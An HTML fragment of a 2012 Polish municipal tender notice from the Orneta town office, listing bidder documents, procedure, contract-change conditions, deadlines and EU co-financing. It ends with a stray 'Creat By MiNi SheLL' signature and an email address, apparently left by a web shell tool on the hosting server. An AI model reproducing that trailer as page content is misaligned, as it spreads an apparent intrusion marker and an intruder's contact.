
<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty sporządzony wg Załącznika nr 1 do IDW 
2) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
3) Kosztorys ofertowy opracowany zgodnie z § 12 IDW wg Załącznika nr 1 Rozdziału V SIWZ 
4) Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom według załącznika nr 7 do IDW 
5) Zastrzeżenie ochrony praw własności intelektualnej i tajemnicy handlowej sporządzone wg załącznika nr 8 do IDW</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2 Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy: 
1) konieczność przedłużenia terminu umownego zakończenia przedmiotu zamówienia z uwagi na: 
a)wydłużenie terminu zakończenia realizacji Zadań z przyczyn niezależnych od Wykonawcy 
b)opóźnienia w rozpoczęciu lub w trakcie realizacji Zadań, odbiorach Zadań, uzyskaniu pozwolenia na użytkowanie lub zgłoszenia zakończenia robót, końcowego rozliczenia Zadań - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy, 
c)wystąpienia zmian w dokumentacji projektowej , wystąpienia robót dodatkowych lub zamiennych niezbędnych do wykonania Zadań, opóźniających lub wstrzymujących realizację zamówienia podstawowego objętego umową z wykonawcą Robót, mających wpływ na uzgodniony termin zakończenia jego realizacji, 
d)przedłużenie procedury przetargowej, uwarunkowania społeczne np. protesty, petycje, odwołania do KIO itp. 
e)wystąpienie siły wyższej. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. 
o okres opóźniający lub wstrzymujący realizację przedmiotu zamówienia 
2) zmianę wynagrodzenia Wykonawcy w przypadku: 
a) zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia odbędzie się w wysokości odpowiadającej zmianie podatku: 
3) zmianę warunków płatności w przypadku zmiany warunków płatności dla Wykonawcy Robót: 
4) zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa: 
5) wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustanie stosunku pracy lub inne zdarzenie losowe i przyczyny niezależne od Wykonawcy) przy pomocy, których Wykonawca realizuje przedmiot umowy. 
W wypadku zmiany osób przy pomocy, których Wykonawca realizuje przedmiot umowy wymienionych w ofercie Wykonawcy, nowe osoby powołane do pełnienia obowiązków muszą spełniać na dzień składania ofert wymagania określone w SIWZ dla pełnienia danej funkcji: 
6) wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna i udowodni, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na nowe osoby spełniające na dzień składania ofert warunki określone w SIWZ dla pełnienia danej funkcji, w terminie określonym we wniosku Zamawiającego; 
7) wystąpienia zmian powszechnie obowiązujących przepisów prawa , bądź wytycznych Instytucji Zarządzającej, Wdrażającej lub Pośredniczącej w zakresie mającym wpływ na realizację przedmiotu umowy; 
8) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
9) Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę: 
10) Konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa współfinansowana ze środków Europejskiego Funduszu Rolnego
 w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013:
działanie   321 Podstawowe usługi dla gospodarki i ludności wiejskiej;
działanie 313, 322, 323 Odnowa i Rozwój Wsi; 
działanie 413 Wdrażanie lokalnych strategii rozwoju..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com